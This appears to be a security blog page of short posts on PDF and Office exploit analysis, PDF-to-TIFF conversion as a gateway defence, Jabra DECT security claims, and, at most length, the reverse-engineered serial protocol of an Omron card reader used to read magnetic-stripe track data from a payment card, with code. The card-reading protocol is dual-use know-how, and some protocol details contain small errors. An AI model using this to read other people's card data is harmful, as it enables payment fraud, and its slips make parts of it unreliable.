Came across this interesting paper from ARTeam (Shub-Nigurrath), in case you are now in the PDF paranoia fraction I mirrored the PDF below in Flash, you might want to click the fullscreen button.

Update: I figured that there is some interest in these collections, as such I will regularly update this page.

I have been asked to provide some information on analyzing and reversing PDF and DOC exploits, here are some hints where to look and how to do it :


PDF

Office files

Sandbox Analysis :
  • CWSandbox is able to analyse PDF files as of 12/2008. It does so by opening the pdf file in an old 8.x version and monitoring various changes. Link
  • Anubis is able to analyse PDF/Flash and Websites. It does so by using IE and Acrobat reader and monitoring changes. Link
Recommended PDF viewer :
Recommended gateway policy for fruity targets within your Enterprise
  • Convert all ingress PDF to picture files (TIFF - fax files), the resulting file will have all the pages in a single TIFF. Note: the standard Windows viewer allows for persistent commenting, annotations, highlights etc.
  • Example with ghostscript : gs -q -sDEVICE=tifflzw -dBATCH -dNOPAUSE -r120 -sOutputFile=OUTPUTFILE.tiff INPUTFILE.pdf 2>&1
  • P.S: Normal rules apply, don't assume GS parser to be 100% safe

Jabra pulls a 1994 microsoft reaction in the year 2009. "The vulnerability is purely theoretical". I thought we were over this.

Jabra claims that the cipher is so resistant that it would take a huge amount of effort. Jabra, do us all a favor and google for "downgrade attack". No need to break anything if you agree to not use encryption (or 0bit key) - see SSL v.2.o

http://uswww03.gnnetcom.com/jabra/cc_stream/white/DECT_Security.pdf

Credit: Security4all tweet

Update: RPW pointed out that the document is from 2007 not from 2009, oops ;)


History
▪ Part 1 - Omron hybrid card reader - New toy
▪ Part 2 - Omron hybrid card reader protocol partly reversed
▪ Part 3 - Demo of implementation (This one)



FYI : 2 Readers are still up for sale on ebay : here and here
Official Product page is here

About: Hitachi Omron card readers are used in various commercial setups. Identity management, payment systems, parking systems are a few of these. The effort displayed on this blog is purely done out of research and awareness purposes. The "bad guys" are a lot more advanced and will not require information displayed within here.

I recently implemented the barebone protocol and functions to read out ISO Track 1+2+3. I will briefly dive into the protocol in this post for those interested. The protocol itself is pretty simple, though bad specifications make it a pain to implement correctly.

Brief how-to:
▪ To initialize the reader for use connect to RS232 port (or a virtual usb com port as in my case) and send the DTR signal. Failure to send the DTR signal will result in no answer to commands and a non-functioning device.
▪ The session (protocol flow) works as described in Figure 2 below. First we send our command in hexadecimal following the syntax described by Figure 1 :

Figure 1

You might ask yourself what the heck DLE stands for: DLE (Data Link Escape) is a control character within ASCII, specifically it is 16 and 0x10; ETX (End of TeXt) = 0x03 ASCII 4.

Following the diagram above the sequence to send would be :
<DLE><STX>COMMAND HERE<DLE><ETX>BCC

What the hell is BCC then? BCC is the checksum/parity Hitachi introduced into the protocol. The documentation is a bit unclear about how exactly to proceed; here is the correct way :

All bytes of the command are XORed with each other, and the result is then XORed with ETX (0x03).

Example (BCC calc):
▪ 10 02 43 32 30 10 03 42
▪ DLE STX C 6 0 DLE ETX BCC
BCC = 43 XOR 32 XOR 30 XOR 03 = 42

Figure 2

Figure 2 shows the protocol handshaking taking place :
1. Host sends command
2. Device acknowledges the receipt with DLE ACK
3. Host sends the enquiry command with DLE ENQ
4. Device sends the response to the command
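
The framing, the BCC rule and the four-step exchange described above, put together as an added example (this is not the author's C# prototype). The device side is a constructed in-memory stand-in so the exchange runs without hardware; that replies use the same DLE STX ... DLE ETX BCC framing, the reply payload, and all function and class names are assumptions of this example.

```python
DLE, STX, ETX, ENQ, ACK = 0x10, 0x02, 0x03, 0x05, 0x06  # ASCII control codes


def bcc(payload: bytes) -> int:
    """XOR of every command byte, then XOR with ETX, as described above."""
    value = ETX
    for byte in payload:
        value ^= byte
    return value


def build_frame(payload: bytes) -> bytes:
    """<DLE><STX> payload <DLE><ETX> BCC"""
    return bytes([DLE, STX]) + payload + bytes([DLE, ETX, bcc(payload)])


def parse_frame(frame: bytes) -> bytes:
    """Return the payload; raise ValueError on bad framing or BCC mismatch."""
    if (len(frame) < 5 or frame[:2] != bytes([DLE, STX])
            or frame[-3:-1] != bytes([DLE, ETX])):
        raise ValueError("bad framing")
    payload = frame[2:-3]
    if frame[-1] != bcc(payload):
        raise ValueError("BCC mismatch")
    return payload


class FakeReader:
    """Constructed stand-in for the device (assumption: replies are framed too)."""

    def __init__(self, reply: bytes):
        self.reply, self.pending = reply, False

    def write(self, data: bytes) -> bytes:
        if data == bytes([DLE, ENQ]) and self.pending:
            self.pending = False
            return build_frame(self.reply)   # step 4: response to the command
        parse_frame(data)                    # step 1: corrupt commands are rejected
        self.pending = True
        return bytes([DLE, ACK])             # step 2: acknowledge receipt


def transact(dev, command: bytes) -> bytes:
    """Run steps 1-4 of Figure 2 and return the validated reply payload."""
    if dev.write(build_frame(command)) != bytes([DLE, ACK]):
        raise IOError("no DLE ACK from device")
    return parse_frame(dev.write(bytes([DLE, ENQ])))  # step 3, then step 4
```

`build_frame(bytes.fromhex("433230"))` reproduces the byte sequence 10 02 43 32 30 10 03 42 from the BCC example; a payload containing 0x10 is not escaped here because the post does not describe how the reader handles that case.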

Here is a video of the C# prototype working on a VISA card (Click the full screen icon to get the details) :

Lots of voices were heard saying they will drop Adobe Acrobat in favor of the free Foxit PDF reader; well, this simple remote code execution vulnerability still works with Foxit as of today :


PS. I love SumatraPDF

Websense believes this blog to be malicious and hence is blocking it, similar to Sonicwall.



Thanks to Steichen P. and Patrick Dardar for the notification, contacted Websense.

Update: Nicolas Brulez (the man) was kind enough to investigate, it apparently matched an exploit signature and is currently in the "remove from the ban list" queue. Thank you Nico!